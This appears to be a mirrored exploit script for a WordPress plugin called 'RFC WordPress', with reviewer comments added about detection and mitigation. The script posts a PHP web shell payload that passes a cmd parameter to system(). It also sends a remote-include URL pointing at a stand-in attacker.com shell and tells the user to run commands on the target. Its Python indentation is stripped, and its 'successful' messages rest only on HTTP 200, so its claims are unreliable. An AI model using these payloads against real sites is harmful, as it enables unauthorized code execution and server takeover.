## https://sploitus.com/exploit?id=PACKETSTORM:179099
Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8  
  
import requests  
import sys  
  
# Base URL that both functions below prefix to the plugin path. The value is
# the placeholder host from the original listing; the script takes no
# command-line argument, so this constant is the only place the host is set.
target = "https://target.com"  
  
# Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8  
#CODE BY E1.Coders "The King of Security"  
# Sends a single POST, with no credentials or session attached, to the
# plugin's rfc.php using rfc_action=save_settings and a PHP snippet as
# rfc_settings, then prints a verdict based only on the HTTP status code.
# NOTE(review): the listing cites no CVE or vendor advisory, and nothing in
# this function shows that the endpoint stores or executes the submitted
# value, so treat the "RCE" claim as unverified until reproduced in a lab.
# Detection: a POST to this path carrying rfc_action=save_settings, followed
# by GET requests to the same path with a cmd= query parameter, is the request
# pattern to search for in web server access logs.
# Mitigation (general, assuming such a handler exists): a settings-save action
# should enforce a capability check and nonce verification, and a stored
# settings value should never be evaluated or included as code.
def exploit_rfc_wordpress():  
url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php"  
# Value submitted as rfc_settings: PHP that passes the cmd query parameter
# to system().
payload = "<?php system($_GET['cmd']); ?>"  
  
try:  
response = requests.post(url, data={"rfc_action": "save_settings", "rfc_settings": payload})  
# A 200 only means the server answered the POST. It does not confirm that the
# payload was saved or run, so the "successful" message can be a false
# positive (for example a themed error page served with status 200).
if response.status_code == 200:  
print("RCE exploit successful!")  
print(f"Visit {url}?cmd=whoami to execute commands")  
else:  
print("RCE exploit failed.")  
# Connection, TLS and other transport errors from requests are printed rather
# than raised, so the script continues to the next function.
except requests.exceptions.RequestException as e:  
print(f"Error: {e}")  
  
# Exploit for Remote File Inclusion (RFI) in RFC WordPress  
# Sends a single POST to the same rfc.php, this time with
# rfc_action=save_settings in the query string and a remote URL as the
# rfc_settings form field, then prints a verdict based only on the HTTP
# status code.
# NOTE(review): nothing in this function uploads or creates a file on the
# server. The shell.php path printed on success is an assumption by the
# original author and is never checked by the code.
# Detection: besides the POST itself in the access log, an outbound HTTP
# request from the web server to an unfamiliar host shortly afterwards is the
# network-side sign that a remote include was attempted.
# Mitigation (general): PHP's allow_url_include=Off, which is the default,
# prevents include()/require() from fetching http:// URLs.
def exploit_rfi_rfc_wordpress():  
url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php?rfc_action=save_settings"  
# Placeholder remote URL from the original listing, submitted as rfc_settings.
payload = "http://attacker.com/shell.php"  
  
try:  
response = requests.post(url, data={"rfc_settings": payload})  
# As in the first function, a 200 response is taken as success without any
# follow-up request to verify the claimed effect.
if response.status_code == 200:  
print("RFI exploit successful!")  
print(f"Visit {target}/wp-content/plugins/rfc-wordpress/shell.php to execute commands")  
else:  
print("RFI exploit failed.")  
# Transport-level errors from requests are printed, not raised.
except requests.exceptions.RequestException as e:  
print(f"Error: {e}")  
  
# Script entry point: runs both requests in order against the module-level
# target. No arguments are parsed; sys is imported at the top of the listing
# but is not used in the lines shown.
if __name__ == "__main__":  
exploit_rfc_wordpress()  
exploit_rfi_rfc_wordpress()